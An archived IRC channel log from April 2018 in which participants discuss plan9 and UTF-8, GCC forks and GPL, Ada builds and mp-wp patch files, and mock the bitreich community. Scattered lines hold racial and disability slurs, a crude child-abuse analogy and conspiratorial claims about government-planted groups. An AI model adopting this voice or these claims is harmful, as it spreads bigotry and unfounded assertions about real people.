1793566;1523036372;lobbes;These principles can change, based on the consent of the bitreich elite. " oh. Okay. Phew 1793567;1523036403;lobbes;Daw, they even got their own freenode channels. 1793568;1523036413;TomServo;Yup, they are not interesting. 1793569;1523036428;trinque;#bitreich-cooking 1793570;1523036575;TomServo;I expect MP will love "Software should be written for programmers, which means the code is the documentation," 1793571;1523036607;TomServo;Wasn't that the power ranger response to MP request to specify bitcoin? 1793572;1523036778;phf;asciilifeform: all these projects are plan9 cargo cults, so there's always going to be utf-8 1793573;1523036869;mircea_popescu;is plan9 somehow deeply related to unicrap, or is it rather they're the sort of geeky dweebs unlikely to ~not~ swallow the imperial hook all the way to the sinker ? 1793574;1523036897;asciilifeform;mircea_popescu: plan9 was the full syphilitic bloom of 'second system disease' of the unix authors 1793575;1523036915;phf;mircea_popescu: utf-8 specifically was invented by rob pike for plan9 1793576;1523036959;phf;https://www.cl.cam.ac.uk/~mgk25/ucs/utf-8-history.txt 1793577;1523036999;mircea_popescu;o hey, i didn't know that. 1793578;1523037023;mircea_popescu;BingoBoingo for your peace of mind, i intend to publish qntra report once mpex proxies back online, seems rather silly otherwise. not forgotten or mothballed or anything. 1793579;1523037032;phf;/rob pike/ken thompson/ 1793580;1523037094;mircea_popescu;i always thought plan9 is this hipster wankish thing ; didn't realise it played the role of noldbug ie official-inca-alternative-for-smart-retards 1793581;1523037235;asciilifeform;it did -- in 1990s. today afaik mostly buried and fertilizing that forest from below 1793582;1523037236;mircea_popescu;check that out, doods who can promise monday delivery for utf-8 on wednesday night, AND THEN DELIVER IT MONDAY. but what they spend their time is utf. holy hell that place. 1793583;1523037320;phf;MDude: are you c-keen? 1793584;1523037331;MDude;No. 1793585;1523037405;mircea_popescu;lol bitreich. 1793586;1523037434;mircea_popescu;"we". what fucking "we." 1793587;1523037472;MDude;I've just gone by MDude/MDude1350 most places until recently, when I started taking up the handle Meticulac. 1793588;1523037495;asciilifeform;https://i.warosu.org/data/vr/img/0031/32/1460407763055.jpg << asciilifeform's head association with 'c keen' 1793589;1523037501;mircea_popescu;MDude "most places" is not something. stop giving summaries, stop talking around the point. either produce something specific or stfu. 1793590;1523037536;mircea_popescu;asciilifeform 98% ? that's... impressive. 1793591;1523037597;phf;asciilifeform: https://mastodon.social/@ckeen 1793592;1523037667;mircea_popescu;ahahaha i though that was a metaphore. 1793593;1523037674;MDude;I was answering the question, but if you want to see what other specific places I've been there's https://meticulac.tumblr.com/find-me . 1793594;1523037716;mircea_popescu;MDude things you've done is a point of interest. places you've been... unless you have naked chicks in the streets of the czech republic / parks of buenos aires / dunes of egypt etc, no. 1793595;1523037833;mircea_popescu;"Home to 146,998 users Who authored 5,033,248" << whoa, this is way the fuck tinier than previously realised. for ALL. THE. NOISE. people have been making about how it's "up and coming" since at least 2-3 years ago... 1793596;1523037944;mircea_popescu;http://btcbase.org/log/2018-04-06#1793562 << it's like a whitepaper see, except on gopher all paper is white. 1793597;1523037944;a111;Logged on 2018-04-06 17:38 trinque: well christ, they have a manifesto right there at the top. 1793598;1523038403;asciilifeform;in other noose, 'rockchip' turns out is a completely usable and clean gentoo station. can be used as workstation also, if not in a hurry. ( running 100% asciilifeform-recipe gentoo, albeit not musltronic; running also self-built kernel; no eggogs, hiccups, good disk access times. the 1 item not yet built with own hands: uboot init thing ) 1793599;1523038458;asciilifeform;also learned that there exists a rockchip laptop, of sorts, 'asus c101pa', but i do not have one here , if someone has the time/inclination he can try it. 1793600;1523039088;danielpbarron;!!rate trinque 2 deedbot maintainer 1793601;1523039091;deedbot;Get your OTP: http://p.bvulpes.com/pastes/4w6bw/?raw=true 1793602;1523039182;danielpbarron;!!v 3BABC480263E30575E526C762D1FAD2DCD10B18ABFEED59ABA7FE6B951F331AE 1793603;1523039182;deedbot;danielpbarron updated rating of trinque from 1 to 2 << deedbot maintainer 1793604;1523039280;mircea_popescu;meanwhile in the lulzy tales : late last night i went into girl's room cuz i couldn't sleep and wanted to play. she was asleep. she woke up startled, and then i could see panic grip her. and i was you know, all "don't worry baby, you're not in trouble, there's nothing wrong" and she was looking at me with these big and growing eyes and turning progressively whiteer. 1793605;1523039306;mircea_popescu;eventually she was awake enough to remember ~she had put earplugs in~ because went to sleep while place still active, and ~that was why~ she couldn't hear a word i was saying. 1793606;1523039327;danielpbarron;!!rate mod6 4 pizarro isp, bitcoin foundation 1793607;1523039330;deedbot;Get your OTP: http://p.bvulpes.com/pastes/TCOhS/?raw=true 1793608;1523039412;danielpbarron;!!v 50ADBC968EC616580B82F8AFD912E796BEA696844B33B54BB73936FCDE7339F9 1793609;1523039412;deedbot;danielpbarron updated rating of mod6 from 3 to 4 << pizarro isp, bitcoin foundation 1793610;1523039481;danielpbarron;!!rate BingoBoingo 3 pizarro isp, qntra chief editor 1793611;1523039483;deedbot;Get your OTP: http://p.bvulpes.com/pastes/vLYLe/?raw=true 1793612;1523039595;danielpbarron;!!v 790DF80AC138CD35C12C4F8A796A0275B384770CF8510D2B4C69223F0D3A8DE8 1793613;1523039596;deedbot;danielpbarron updated rating of BingoBoingo from 2 to 3 << pizarro isp, qntra chief editor 1793614;1523039738;ave1;http://btcbase.org/log/2018-04-05#1793340, yes I realized last night, I've been working on fixing it. I found the first problem, now onto the next (etc.) 1793615;1523039738;a111;Logged on 2018-04-05 20:22 asciilifeform: ave1: your gnat builder barfs 40 minutes in, incidentally, with the following death : http://p.bvulpes.com/pastes/ftgUL/?raw=true ( last n lines ) 1793616;1523039755;danielpbarron;!!rate hanbot 4 lighting the fire under republican asses 1793617;1523039758;deedbot;Get your OTP: http://p.bvulpes.com/pastes/H10dn/?raw=true 1793618;1523039846;BingoBoingo;http://btcbase.org/log/2018-04-06#1793578 << Kinda what I figured. I remember last time the proxies went on strike there were forensics involved. Most of my worries atm concern being surrounded by the sort of Rustic so called salt of the earth Italians that they put in the background of Gringo tourism marketing 1793619;1523039846;a111;Logged on 2018-04-06 17:50 mircea_popescu: BingoBoingo for your peace of mind, i intend to publish qntra report once mpex proxies back online, seems rather silly otherwise. not forgotten or mothballed or anything. 1793620;1523039858;ave1;btw, turns out AdaCore have implemented support for crapple IOS (arm 64 + macho) in their gcc, this cannot be found in fsf gcc's. But needs #ifs and #ifdefs, one line was #ifdef MACHO_TARGET, but should have been #if. 1793621;1523039881;ave1;macho -> mach-o 1793622;1523039884;mircea_popescu;lmao 1793623;1523039886;danielpbarron;!!v D839A92777D9E2704A7D07BC0B17666D9D6385F98EE7B69A4178AA5EFED86414 1793624;1523039887;deedbot;danielpbarron updated rating of hanbot from 3 to 4 << lighting the fire under republican asses 1793625;1523039890;mircea_popescu;i'm sorry, lma-o 1793626;1523039961;danielpbarron;!!rate esthlos 2 met for sushi 1793627;1523039962;asciilifeform;ave1: abolishing the standard library would make it quite painless to port gnat to anything to which gcc already has a backend. but as it is, the existence of crappla gnat doesn't help us any, the abi is completely different 1793628;1523039963;deedbot;Get your OTP: http://p.bvulpes.com/pastes/XE0fv/?raw=true 1793629;1523040079;BingoBoingo;asciilifeform: Battery life on the rockchip portable looks VERY appealing 1793630;1523040128;danielpbarron;!!v 36010E95C24B73DA9130FEF7175ACF7593F0CD6461538209A990DF703CBA80F3 1793631;1523040129;deedbot;danielpbarron updated rating of esthlos from 3 to 2 << met for sushi 1793632;1523040130;asciilifeform;BingoBoingo: keep in mind that the figure claimed concerns the included turdroid or whatever it comes with. in practice we do not know whether proper linux would work similarly. somebody will have to try. 1793633;1523040198;BingoBoingo;asciilifeform: The figure claimed leaves lots of room for comfort 1793634;1523040203;ave1;asciilifeform, yes I know, I've not tried to separate AdaCore's ada from AdaCore's gcc backend (to FSF gcc backend). AdaCore's gcc backend has significant canges from FSF. As this would be an interesting experiment, I will put it on the list (other thing to do, is put Ada 2017 on top of gcc 4.9.4 instead of 7.x) 1793635;1523040214;BingoBoingo;Also apparently Uruguay has tornados now https://www.elpais.com.uy/informacion/sociedad/tromba-sorprendio-manana-rambla.html 1793636;1523040240;BingoBoingo;Last one here was in 2016 out in Rocha where the lobos marinos live 1793637;1523041748;deedbot;http://trilema.com/2018/medicine-tactics/ << Trilema - Medicine Tactics 1793638;1523041980;trinque;wahaha, that's pretty good. 1793639;1523042278;TomServo;I can't believe I guessed correctly what she meant before the reveal. Namespace dyslexia somehow clued me. 1793640;1523043075;ben_vulpes;#bitreich-en derping endlessly about with xml 1793641;1523043263;mircea_popescu;o this is a thing ? 1793642;1523043284;ben_vulpes;aha 1793643;1523043310;mircea_popescu;o look, bitreich con! 1793644;1523043312;mircea_popescu;bwahaha. 1793645;1523043317;ben_vulpes;called our logs "insane" and "good source of entropy" if you can imagine the cheek 1793646;1523043322;hanbot;latest in mp-wp saga: spyked's patch on vtools let me gpr build the phf's patcher and vdiff, latter of which made a genesis, former of which dies on pressing wiff: http://p.bvulpes.com/pastes/2IVPp/?raw=true 1793647;1523043364;mircea_popescu;ben_vulpes how'd they have seen such logs ? 1793648;1523043387;ben_vulpes;i linked 'em 1793649;1523043405;mircea_popescu;is c-keen character the candidate mp i nthe space then ? 1793650;1523043428;ben_vulpes;__20h__ parades as such 1793651;1523043457;ben_vulpes;"This is forbidden and will be punished." in response to my asking if they kept logs 1793652;1523043504;asciilifeform;== 'only usg logs us, and we like it' ? 1793653;1523043517;ben_vulpes;yeah effectively. 1793654;1523043536;mircea_popescu;hey, what do kids know. 1793655;1523043572;BingoBoingo;How many men has the bitreich sent south to carve out their safe space? 1793656;1523043580;mircea_popescu;" C-Keen: read the fucking backlog, im not going to repeat myself" lol. perhaps the idea is that one's required to maintain connection as a show of loyalty. a soert of "mining" if you will. 1793657;1523043603;mircea_popescu;ben_vulpes my read is that __20h__ is ~bob beck in the outfit. 1793658;1523043634;mircea_popescu;the way dept of state "think tanks" imagine creating "moderate rebel" leadership works is you have a fake one to protect the real one like a skirting. 1793659;1523043749;mircea_popescu;asciilifeform it strikes me how strictly identical to early urbit this thing is. same sort of socialist revolution aggitated "building the future" can barely contain selves on chair sorta vibe. 1793660;1523043918;mircea_popescu;http://btcbase.org/log/2018-04-06#1793557 << a yeah, codemadness dood is there. 1793661;1523043918;a111;Logged on 2018-04-06 17:35 phf: they are more of a suckless spinoff 1793662;1523044055;mircea_popescu; https://lists.suckless.org/dev/1609/30538.html for archival lulz. 1793663;1523044309;mircea_popescu;http://p.bvulpes.com/pastes/rjtFr/?raw=true << lolz. teh usg is very, very affraid, made EVEN COOLER alt-tmsr!!! it'll work as well as all the cooler bitcoins it made to date NO DOUBT1!11 1793664;1523044334;ben_vulpes;aaand a doubleban 1793665;1523044356;ben_vulpes;http://p.bvulpes.com/pastes/A9A1R/?raw=true << logs from before mircea_popescu showed up 1793666;1523044376;mircea_popescu;pretty sure they know who we are, in the very strict sense of "i've spent my past six months having nightmares with these doods" 1793667;1523044469;BingoBoingo;Well, scared enough Bloomberg is hailing the arrival of Soros to "crypto" today 1793668;1523044518;mircea_popescu;anyway, it's amusing how http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/#selection-117.0-121.619 still very much applies. so basically what, they're going to fragment the republic into little irrelevant shards full of really stuborn / ingroup-loyal otakus as a path to survival ? lulzk. 1793669;1523044577;mircea_popescu;this bright okhrana idea resulted in a very shot tsar. 1793670;1523044582;BingoBoingo;It worked when they did it to the black panthers 1793671;1523044595;mircea_popescu;the black panthers were black. 1793672;1523044606;BingoBoingo;Punchline 1793673;1523044652;asciilifeform;'we'll breed 9000 mircea_popescus out of fungal broth and no one will ever find his way to the original one! genius' 1793674;1523044702;mircea_popescu;the problem with idiocy is that once you go there you kinda become captive. they actually imagine the situation is ~i~ need more people, not the other fucking way around. because "headcount is everything" hurr durr. 1793675;1523044732;BingoBoingo; 'we'll breed 9000 mircea_popescus out of fungal broth and no one will ever find his way to the original one! genius' << Part of what keeping the blog counters 1793676;1523044805;mircea_popescu;anyway, gotta do more work on the camouflage, by the time i can get "status is nothing" aka "we are just as pantsuit as any other pantsuit outfit" within five lines... 1793677;1523044903;mircea_popescu;but in other news of about same importance and entertainment value, kingdom rush frontiers from ironhide games is fucking amiga hard. holy hell what have these people done! 1793678;1523045098;asciilifeform;mircea_popescu: every single, without exception, cave of urbit/suckmore/etc 'neets' that's been dug up so far, smells ~exactly the same to me . and imho neither surprising nor really avoidable, this is rather like those squirrels that live in american cities, that eat garbage, who is surprised that they all have scurvy in same way 1793679;1523045102;mircea_popescu;http://btcbase.org/log/2018-04-06#1793570 << lmao. because children imagine "being a programmer" is having magical powers. somehow "being a cook" doesn't come in their head with a "food automatically makes itself around you", on the basis of direct experience with the mcdonalds fries counter. but "programmer" still means you magically intuit what the shit idiotic assumptions every mcdonalds employee baked into the "codebase". 1793680;1523045102;a111;Logged on 2018-04-06 17:42 TomServo: I expect MP will love "Software should be written for programmers, which means the code is the documentation," 1793681;1523045109;asciilifeform;these folx eat nothing at all but 'anglosphere' 1793682;1523045141;mircea_popescu;im not so directly convinced that is the problem, seeing how you should see the latinas. they eat nothing but spanglosphere, and it's ~similar. 1793683;1523045169;asciilifeform;the operative item is not which-sphere, but that they live on one another's shit 1793684;1523045208;mircea_popescu;yes ; but then you look at the "right" as understood in the us, weirdo fringe groups built around "religion" in the sense of charismatic personality, and they're in no sense different EITHER. 1793685;1523045222;asciilifeform;0 connection with actual human intellectual tradition, complete innocence of philosophy/mathematics/history(of any period whatsoever) 1793686;1523045242;asciilifeform;... and exactly the same, for this exact reason 1793687;1523045254;asciilifeform;they're africans, of whatever colour. 1793688;1523045293;mircea_popescu;yes, im starting to suspect that's the key. "los pueblos sin historia son condenados al fracaso". 1793689;1523045332;mircea_popescu;it's not that "the programming language without recursion hasn't been found yet". is that it's not possible to have one. replace history and society in there, same deal. 1793690;1523045347;mircea_popescu;no reflective logs ~= dead. 1793691;1523045390;asciilifeform;catch one and plug'im into the mains, and you'll find out many surprises, e.g. that mathematics 'is what the calculator does', philosophy is 'something to do with genders of transgressed boundaries or somesuch poppycock', history 'i went to school like errybody else and learned how we allied with germany against ussr' (actual quote from americaness asciilifeform actually fucked) and i could continue butwhy. 1793692;1523045445;mircea_popescu;what'd pantsuitism be without its superficialism. 1793693;1523045468;mircea_popescu;asciilifeform star trek philosophy is, after all (as iirc you aptly pointed out), "everyone wears this pantsuit". thassit. 1793694;1523045506;asciilifeform;well also it had the admixture of protestant 'propriety' and (for lack of fitting word)... ordnung 1793695;1523045508;asciilifeform;butyes. 1793696;1523045550;mircea_popescu;nobody ever fucks the bridge bunnies, huh. 1793697;1523045567;asciilifeform;wassat 1793698;1523045590;mircea_popescu;girls with no speaking parts 1793699;1523045619;mircea_popescu;like the white girls in blacksploitation media products, there to impart status upon the "noble barbarians:" 1793700;1523045646;mircea_popescu;notably, bridget fonda's role in this world. (she gets shot in the stomach for it, most satisfyingly.) 1793701;1523046237;mircea_popescu;http://btcbase.org/log/2018-04-06#1793620 << is it just me not comprehending how there can be two "g"ccs ? 1793702;1523046237;a111;Logged on 2018-04-06 18:37 ave1: btw, turns out AdaCore have implemented support for crapple IOS (arm 64 + macho) in their gcc, this cannot be found in fsf gcc's. But needs #ifs and #ifdefs, one line was #ifdef MACHO_TARGET, but should have been #if. 1793703;1523047209;asciilifeform;forks 1793704;1523047409;mircea_popescu;but why call it gcc if you don't aim to actually bury rms's folly ? 1793705;1523047462;mircea_popescu;moreover, there's exactly ZERO discussion of this anywhere. major, undeclared fork passing uncommented for what, a decade ? is this the level of "rational" idiocy in these muppets ? 1793706;1523047487;asciilifeform;next could ask, why call it champagne if it never saw france 1793707;1523047488;mircea_popescu;100% of all discussion on the subject is our logs 1793708;1523047583;asciilifeform;mircea_popescu: it gets 'better' : 9000 forks, of various degrees of 'declared', many also pissing on gpl and distributing either closed turds, or turd + source and the latter on examination does not build . pestilential in embedded world 1793709;1523047692;asciilifeform;not small fry, either, but major vendors, philips, toshiba, hitachi, many others, who sell 100mils/chips/yr , for which the only compiler is... one of these 1793710;1523047724;mircea_popescu;well, i guess we'll have to have a terminology standard then. how about this : fsf = "a little coven of pantsuit retards defined by loyalty to rms and no further characteristics", ie fsf is about on the level of importance of "starslatecodex" ; gnu = "symbol with no concrete reference, sometimes used as g- or gnu- prefix by marketeers exacly like the string 'super-'" ; open = "group of usg wreckers working on perpetuating the 1793711;1523047724;mircea_popescu; principles of usg diffusely outside of usg.microsoft, usg.intel, usg.ibm and other enummerable badness". that about work ? 1793712;1523047743;asciilifeform;fsf long ago dessicated corpse, with ~zero influence on anything 1793713;1523047747;mircea_popescu;right. 1793714;1523047771;asciilifeform;they're a sort of mausoleum, with the small detail that their lenin is still, in a way, alive 1793715;1523047774;asciilifeform;but 'human mushroom' 1793716;1523047790;mircea_popescu;it could be "one dood's blog", if rms could ever muster enough cogency to keep a blog. but in fact, it's a loose association of conference-goers. for the same money they could be a "polyamory club" or w/e. 1793717;1523047842;mircea_popescu;!!up DaSancho 1793718;1523047843;deedbot;DaSancho voiced for 30 minutes. 1793719;1523047929;mircea_popescu;asciilifeform "but vendors could never distribute meaningless source, the million eyes of the community would spot it and things would happen!" 1793720;1523048151;deedbot;http://qntra.net/2018/04/failed-millenial-boxer-beats-bus-with-barricade/ << Qntra - Failed Millenial Boxer Beats Bus With Barricade 1793721;1523048287;asciilifeform;mircea_popescu: it is not even clear to me that eben moglen (note, not rms) gpl experiment , i.e. 'use copyrasty against itself', worked for a short while ( to naked eye it would seem that it did, bsd routines got subsumed into microshit, gnu -- not , but there ~are~ alternative plausible explanations that don't involve 'fear of gpl violation' ) 1793722;1523048374;asciilifeform;iirc mircea_popescu had a piece about how troobelievers in 'rule of law' will set themselves up into ridiculously doomed situations, where they fixate on some technicality, like changing their names to punctuation marks or somesuch, that Will Surely Crash The System 1793723;1523048428;mircea_popescu;i do not believe the cleverness worked ; moreover, this instant example aside, i have TONS of example of exactly the same "cleverness" NOT working against the empire, all the way down to http://trilema.com/2013/the-endless-story-of-korea/#selection-63.0-67.2 1793724;1523048440;asciilifeform;'sovereign citizens' iirc 1793725;1523048454;mircea_popescu;this is akin to the notion that redskins would have used treaties to opress white settlers. bitch, really ? 1793726;1523048471;asciilifeform;noshit, exactly same 1793727;1523048516;mircea_popescu;asciilifeform indeed. the broad box this falls into is "accepting the structure but debating the results". once you've eaten up the premises, what the fuck cartoonish "ha-HAA!" can you possibly expect, jesus fuck, 12 year olds moving about freely. 1793728;1523048546;mircea_popescu;but, nothing's easier than selling unprincipled exceptions to comfort seekers. 1793729;1523048561;mircea_popescu;in fact, the whole fucking discipline of zek/cattle handing is based on this fundamental rule. 1793730;1523048627;mircea_popescu;so, no, i don't expect moglen's "one weird trick" worked or could have worked, nor do i expect moglen is, intellectually speaking, old enough to decide whom to fuck. 1793731;1523049029;asciilifeform;the other interesting bit ( tho naggum treated it better than i have the stamina to ) is how gcc set back the compiler field by, perhaps , decades, by playing the 'dun matter how complex, so long as theoretically 'open' ' game 1793732;1523049129;mircea_popescu;it's funny how this is an exact implementation of the political concept of "filibuster". 1793733;1523049130;asciilifeform;a 500k-loc ( ignoring even for a moment the far greater heft of 'modern' wonders ) c/cpp proggy is, for all intents and purposes, closed-source, even if every line is published, because it is quite impossible for anyone -- even author -- to get a proper grip on its behaviour space 1793734;1523049165;mircea_popescu;the equivalent would be a "very good compiler -- it either compiles or never finishes, so it can't be said it ever encountered an error. drop your compile error rate to 0% with our new technology". 1793735;1523049172;asciilifeform;now add to this, autoconf, 'libraries', the idjit os... 1793736;1523049186;mircea_popescu;except here it's "not closed in the sense of we don't give you text to read ; but open in the sense we give you an endless stream to read" 1793737;1523049198;mircea_popescu;asciilifeform exactly. 1793738;1523049270;mircea_popescu;but see, here's how it latches into imperial systematic child abuse : the esltards are brought up to think their own limits are shameful, and consequently... "nobody dared" point out that he, personally, can not read the source provided, and THEREFORE, for ~this reason~, it has NOT BEEN PROVIDED. 1793739;1523049320;mircea_popescu;they dare say this to me, "oh, trilema is too hard to read, i'm not reading it". that part, yes. they however do not say it in the one direction where it belongs said : "the source you published is too long for me to comfortably read, therefore you are in breach of your obligation ; fix it or ima burn down your shack." 1793740;1523049375;asciilifeform;consider , for instance, when was the last time you saw a ( heathen ) patch that ~subtracted~ bulk 1793741;1523049377;mircea_popescu;and it is EXACTLY child abuse. some people take five year olds and teach them how to take penis up their asshole. usg takes five year olds and teaches them to be ashamed of saying "i, therefore", and affraid of saying "this is too much to read". 1793742;1523049393;mircea_popescu;i never saw such a patch (then again i am not a major patch reader>) 1793743;1523049400;asciilifeform;i never once have seen such. 1793744;1523049435;asciilifeform;~have~ read plenty of iterated revisions of mathematical work where (sometimes over ~years~) author succeeded in making proof shorter 1793745;1523049448;asciilifeform;but nuffin afaik post-'95 or so 1793746;1523049533;mircea_popescu;the large problem is that, generally unbeknownst to the victims of usg child abuse, they are actually not fit for any kind of intellectual work anymore, nor will ever be. 1793747;1523049551;phf;http://btcbase.org/log/2018-04-06#1793646 << i'm moving too slow, please wait till tomorrow for me to push the regrind with fixes. if you can give me that version of mp-wp.vpatch unsigned that would be helpful 1793748;1523049551;a111;Logged on 2018-04-06 19:35 hanbot: latest in mp-wp saga: spyked's patch on vtools let me gpr build the phf's patcher and vdiff, latter of which made a genesis, former of which dies on pressing wiff: http://p.bvulpes.com/pastes/2IVPp/?raw=true 1793749;1523049558;mircea_popescu;much like the kid who spent his preteen years sewing footballs for nike is never going to be a great pianist. 1793750;1523049564;*;asciilifeform remembers , as a teenager, seeing a win95-afflicted box with a rotting hdd, losing 2-3% of all sectors and... thing still boots, still functions, ~why?~ , what was all that crapola ~for~ 1793751;1523049722;mircea_popescu;asciilifeform this line is shakier ; i have seen good cars missing a few % of the parts through locals' insane notions of maintenance, still running. "what were they for ?" well, it's like this : the cost for the car to run is X, built out of x1...xn costs to do various itemized portions of "to run". if cost xi is due to components Ci1...Cim, should Cij fail, its slack will probably be picked up by the rest (often, in some so 1793752;1523049722;mircea_popescu;rt of pyramidal arrangement, picked up for ever more), but the xi will INCREASE (mostly because the "cost to run" now also includes wear and tear of parts not designed to wear and tear in that way. 1793753;1523049734;mircea_popescu;so at an increase of operating cost, unmaintained complex machinery continues to function. 1793754;1523049776;mircea_popescu;you could have a much simpler car, of course, but X would be proportionately larger. which is why no 1918 car can compete with modern cars in terms of say fuel economy. 1793755;1523049823;asciilifeform;well i did not mean in the sense of how the good doktor shiro ishii discovered that man can 'run for a while' with no stomach 1793756;1523049920;mircea_popescu;consider actual example : as i said at some point i bought used bmw. you might know or not, but these engines actually have a GEARBOX for the fan aspirating air to cool the radiator. this particular engine's gearbox for the fan was shot, resulting in a fan so weak you could stop it with finger (properly maintained, it's so strong as to snap a finger off). therte's a... special 2nd line fan system for this situation, and car w 1793757;1523049920;mircea_popescu;as running that almost non stop, resulting in too much current draw, resulting in ac bringing available power too low, resulting in battery not getting enough etc. 1793758;1523049938;asciilifeform;but of actual dross. e.g. most of what glibc gloms on to every executable, never executes, these are bits you can flip with impunity 1793759;1523049943;mircea_popescu;car ran fine. and would have ran fine like this for however many mn kms, at the cost of having to change the battery 3x more often than per design 1793760;1523049948;mircea_popescu;ie, maybe 0.2 cents a km. 1793761;1523049952;mircea_popescu;all this is calculable. 1793762;1523050014;asciilifeform;right, and i also once met a d00d who calculated that it is cheaper to fill his hydraulic fluid tank weekly for several yrs, than to fix the leak 1793763;1523050029;mircea_popescu;asciilifeform well, i think we touched briefly in here on the advantage of physical systems, and how they could be tested back when they were still used, over digitalisms. 1793764;1523050038;asciilifeform;but in that case it can be debated whether he is still using 'the same machine' as he bought, or a 'new', africanized one 1793765;1523050065;mircea_popescu;hey, cheaper is the rule of machinery. as long as you correctly calculate the cheaper, all industrial process is nothing but. 1793766;1523050080;asciilifeform;supposing the calculation was on correct premises. 1793767;1523050083;*;mircea_popescu spent many years of life at the task of ensuring the correctness of those calculations 1793768;1523050085;asciilifeform;( leaks , for instance, have a way of widening ) 1793769;1523050091;mircea_popescu;"efficiency expert" in industry is what that is. 1793770;1523050097;mircea_popescu;asciilifeform indeed. 1793771;1523050112;mircea_popescu;anyway, taking gal for steaks, bbl. 1793772;1523050118;*;asciilifeform also bbl 1793773;1523057765;asciilifeform;trinque, phf : phunphakt, without clock set, cannot emerge even gnu screen, it fetches, yes!, from git, and 'ssl certificate not yet valid' didjaknow. 1793774;1523057770;asciilifeform;clockism quite pervasive. 1793775;1523058453;trinque;deep deep sads and justwantedtos in portage at the moment. 1793776;1523058469;*;trinque afk too, actually, for steaks even 1793777;1523058483;trinque;bday steaks, ripe old age of 31. 1793778;1523058778;asciilifeform;happy bday trinque 1793779;1523058864;shinohai;Came to wish trinque happy birthday as well, enjoy teh steaks! 1793780;1523058903;*;shinohai has birthday in 9 days 1793781;1523059024;asciilifeform;aaaand apparently emacs 25.3.r4 pulls in... gnutls 1793782;1523059029;asciilifeform;which i had nfi even existed 1793783;1523059045;asciilifeform;( a fsfistic fork of openssl, naturally ) 1793784;1523059079;asciilifeform;https://www.gnu.org/software/emacs/manual/html_mono/emacs-gnutls.html 1793785;1523059115;asciilifeform;and of course it is not hard to find out ~why~ this happened : http://tahirhassan.blogspot.com/2016/03/installing-gnutls-on-emacs.html >> 'GnuTLS is needed for adding the https URL of MELPA to the package archive source list' 1793786;1523059142;asciilifeform;and melpa of course being the 'modern' crapola repo that gives us such marvels as the 9000 dependencies of 'flycheck' ( see logz! ) and other liquishit. 1793787;1523059445;mod6;trinque: happy b-day man :] 1793788;1523059474;trinque;thanks gents! bbl 1793789;1523059531;mod6;o7 1793790;1523059859;douchebag;happy birthday friendo 1793791;1523062777;danielpbarron;!~later tell hanbot can i get your copy of footnotes.php ? 1793792;1523062778;jhvh1;danielpbarron: The operation succeeded. 1793793;1523063527;mircea_popescu;well, i just had steaks! (at the doris place mentioned in teh logs). 1793794;1523063716;mircea_popescu;also what the fuck is a tahir hassan. 1793795;1523064225;asciilifeform;a good candidate for swedish minister of culture, i imagine 1793796;1523064264;mircea_popescu;lel 1793797;1523064286;hanbot;http://btcbase.org/log/2018-04-06#1793747 << http://thewhet.net/mp-wp_genesis.vpatch 1793798;1523064286;a111;Logged on 2018-04-06 21:19 phf: http://btcbase.org/log/2018-04-06#1793646 << i'm moving too slow, please wait till tomorrow for me to push the regrind with fixes. if you can give me that version of mp-wp.vpatch unsigned that would be helpful 1793799;1523064350;mircea_popescu;6mb to get a fucking blog cms going. oh epic world of bits... 1793800;1523064536;mircea_popescu;165kloc. 1793801;1523065071;mircea_popescu;hanbot oddly the file doesn't pass utf-8 ; but passes iso 8859. there's some artefact in there. 1793802;1523065124;hanbot;hmmph 1793803;1523065209;lobbes;danielpbarron: I just slapped a copy up if you want it >> http://lobbesblog.com/static/footnotes.php.tar.gz 1793804;1523065360;hanbot;danielpbarron http://p.bvulpes.com/pastes/tRv6V/?raw=true , in wp-content/plugins/footnotes.php_/footnotes.txt 1793805;1523065388;hanbot;o cool deal lobbes 1793806;1523065640;mircea_popescu;hanbot : file -bi reports "text/x-diff; charset=us-ascii", which seems proper ; however awk -vFS="" '{for(i=1;i<=NF;i++)w[$i]++}END{for(i in w) print i,w[i]}' 'mp-wp_genesis.vpatch' spits out http://p.bvulpes.com/pastes/YQn0g/?raw=true which shows the problem -- you got a buncha garbage single-occurence chars in there. 1793807;1523066169;hanbot;_getSeparators : function() { var re = '', i, str = this.editor.getParam('spellchecker_word_separator_chars', '\\s!"#$%&()*+,-./:;<=>?@[\]^_{|}§©«®±¶·ž»ŒœŸ¿×÷€\u201d\u201c'); << sample itam. they're buried in the code as ad-hoc magic chars. 1793808;1523066182;mircea_popescu;nuts. 1793809;1523066282;mircea_popescu;honestly i'd propose taking the "Spellchecker" out altogether, but something tells me the hackery is not limited to that module. i guess make a list of all the places they appear, see if it can all be excised or just replaced with better notation ? 1793810;1523067450;danielpbarron;lobbes, hanbot, ty 1793811;1523067557;hanbot;mircea_popescu yeah, will do 1793812;1523067582;hanbot;nice scripty btw 1793813;1523069091;mod6;evenin'. how goes? 1793814;1523073327;mircea_popescu;wait, wait, philipinoy no longer on list of usg pet states ?! BUT THE SUCCESS OF INTERNATIONAL DIPLOMACIES AND INTRIGUES?!?!?! 1793815;1523073361;mircea_popescu;where's all the pantsuit press discussing "the embattled usg, ever more isolated on the world stage" ? what, this rhodesia doesn't get the usual rhodesian press ? 1793816;1523073494;mircea_popescu;BingoBoingo "burdeoning". 1793817;1523073684;mircea_popescu;and how you doing down there anyways ? 1793818;1523075772;phf;http://btcbase.org/log/2018-04-06#1793785 << items predates melpa by many years. i suspect first serious item to rely on gnutls was GNUS, but initially integration was done by calling a subprocess and piping things into it. gnutls (as well as dbus, libxml, imagemagick) as linked in library is a more recent phenomenon 1793819;1523075772;a111;Logged on 2018-04-06 23:58 asciilifeform: and of course it is not hard to find out ~why~ this happened : http://tahirhassan.blogspot.com/2016/03/installing-gnutls-on-emacs.html >> 'GnuTLS is needed for adding the https URL of MELPA to the package archive source list' 1793820;1523075837;mircea_popescu;there was some drama with imagemagick linking and vulnerabilities, but i don't recall it right now 1793821;1523075895;mircea_popescu;meanwhile in obscure ro jokes, https://www.youtube.com/watch?v=_vEiR6Rb92M 1793822;1523075907;phf;asciilifeform's favorite graphic metaphor of the whole spittoon is always apropos 1793823;1523075935;phf;http://btcbase.org/log/2018-04-07#1793797 << thank you! at 6mb it will require some work to put it into btcbase patches.. 1793824;1523075935;a111;Logged on 2018-04-07 01:24 hanbot: http://btcbase.org/log/2018-04-06#1793747 << http://thewhet.net/mp-wp_genesis.vpatch 1793825;1523075958;mircea_popescu;speaking of which, it's true that the whole alt-pantsuit "foss" movement failed to design (or to deliver, or to mean anything, or etcetera, sursure), but nevertheless the ashes they left behind are amenable to retrospective redesign. 1793826;1523075980;mircea_popescu;it's pretty clear LAMP was the whole schtick, and it's evident where imagemagick would have fit 